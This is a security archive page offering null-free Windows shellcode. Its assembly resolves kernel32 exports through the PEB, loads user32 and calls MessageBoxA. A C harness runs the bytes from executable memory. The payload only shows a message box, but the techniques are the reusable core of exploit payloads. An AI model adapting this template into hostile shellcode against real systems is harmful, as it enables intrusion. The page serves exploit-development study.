what you don't know can hurt you

All Windows Null-Free MessageBoxA Shellcode

All Windows Null-Free MessageBoxA Shellcode
Posted Jul 12, 2011
Authored by AutoSec Tools | Site autosectools.com

167 bytes small all Windows null-free MessageBoxA shellcode. Tested on 2000, XP, XP x64, Vista, 7, 8 M3 x64.

tags | shellcode
systems | windows
MD5 | dfa35acf94a6226ccd3a9e44c48db966

All Windows Null-Free MessageBoxA Shellcode

Change Mirror Download
/*

;------------------------------------------------------------------------
;Title...................All Windows Null-free MessageBoxA Shellcode
;........................167 Bytes
;Release Date............7/11/2011
;Tested On...............Windows 2000, Windows XP, Windows XP x64,
;........................Windows Vista, Windows 7, Windows 8 M3 x64
;------------------------------------------------------------------------
;Author..................John Leitch
;Site....................http://www.autosectools.com/
;Email...................john@autosectools.com
;------------------------------------------------------------------------

bits 32

xor ebx, ebx

jmp short start

;================================
;Find Function
;================================
find_function:

;================================
;Find Kernel32 Base
;================================
mov edi, [fs:ebx+0x30]
mov edi, [edi+0x0c]
mov edi, [edi+0x1c]

module_loop:
mov eax, [edi+0x08]
mov esi, [edi+0x20]
mov edi, [edi]

cmp byte [esi+0x0C], '3'
jne module_loop

;================================
;Kernel32 PE Header
;================================
mov edi, eax
add edi, [eax+0x3c]

;================================
; Export directory table
;================================
;0x00 Export Flags
;0x04 Time/Date Stamp
;0x08 Major Version
;0x0A Minor Version
;0x0C Name RVA
;0x10 Ordinal Base
;0x14 Address Table Entries
;0x18 Number Of Names
;0x1c Address Table RVA
;0x20 Name Pointer Table RVA
;0x24 Ordinal Table RVA
;================================

;================================
;Kernel32 Export Directory Table
;================================
mov edx, [edi+0x78]
add edx, eax

;================================
;Kernel32 Name Pointers
;================================
mov edi, [edx+0x20]
add edi, eax

;================================
;Find LoadLibraryA
;================================
mov ebp, ebx
name_loop:
mov esi, [edi+ebp*0x4]
add esi, eax
inc ebp
mov ecx, [esp+0x4]
cmp dword [esi], ecx
jne name_loop
mov ecx, [esp+0x8]
cmp dword [esi+0x4], ecx
jne name_loop

;================================
;LoadLibraryA Ordinal
;================================
mov edi, [edx+0x24]
add edi, eax
mov bp, [edi+ebp*0x2]

;================================
;LoadLibraryA Address
;================================
mov edi, [edx+0x1C]
add edi, eax
mov edi, [edi+(ebp-0x1)*0x4] ;subtract ordinal base
add eax, edi
ret

start:

;================================
;Call LoadLibraryA
;================================
push 0x7262694C ;Libr
push 0x64616F4C ;Load
call find_function

xor ecx, ecx
mov cx, 0x3233 ;32
push ecx

push 0x72657375 ;user

push esp ; lpFileName

call eax
push eax

;================================
;Call GetProcAddress
;================================
push 0x41636F72 ;rocA
push 0x50746547 ;GetP
call find_function

pop ecx
pop ecx
pop ecx

push 0x041786F0; oxA
shr dword [esp], 0x4
push 0x42656761; ageB
push 0x7373654D; Mess

push esp ; lpProcName
push ecx ; hModule

call eax

;================================
;Call MessageBoxA
;================================
push ebx
push ebx
push ebx
push ebx
call eax

*/

#include <stdio.h>
#include <windows.h>

using namespace std;

int main()
{

char* shellcode =
"\x31\xdb\xeb\x55\x64\x8b\x7b\x30"
"\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47"
"\x08\x8b\x77\x20\x8b\x3f\x80\x7e"
"\x0c\x33\x75\xf2\x89\xc7\x03\x78"
"\x3c\x8b\x57\x78\x01\xc2\x8b\x7a"
"\x20\x01\xc7\x89\xdd\x8b\x34\xaf"
"\x01\xc6\x45\x8b\x4c\x24\x04\x39"
"\x0e\x75\xf2\x8b\x4c\x24\x08\x39"
"\x4e\x04\x75\xe9\x8b\x7a\x24\x01"
"\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c"
"\x01\xc7\x8b\x7c\xaf\xfc\x01\xf8"
"\xc3\x68\x4c\x69\x62\x72\x68\x4c"
"\x6f\x61\x64\xe8\x9c\xff\xff\xff"
"\x31\xc9\x66\xb9\x33\x32\x51\x68"
"\x75\x73\x65\x72\x54\xff\xd0\x50"
"\x68\x72\x6f\x63\x41\x68\x47\x65"
"\x74\x50\xe8\x7d\xff\xff\xff\x59"
"\x59\x59\x68\xf0\x86\x17\x04\xc1"
"\x2c\x24\x04\x68\x61\x67\x65\x42"
"\x68\x4d\x65\x73\x73\x54\x51\xff"
"\xd0\x53\x53\x53\x53\xff\xd0";

printf("shellcode length: %i", strlen(shellcode));

LPVOID lpAlloc = VirtualAlloc(0, 4096, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(lpAlloc, shellcode, strlen(shellcode));

((void(*)())lpAlloc)();

return 0;
}
Login or Register to add favorites

File Archive:

July 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    15 Files
  • 2
    Jul 2nd
    19 Files
  • 3
    Jul 3rd
    11 Files
  • 4
    Jul 4th
    0 Files
  • 5
    Jul 5th
    0 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close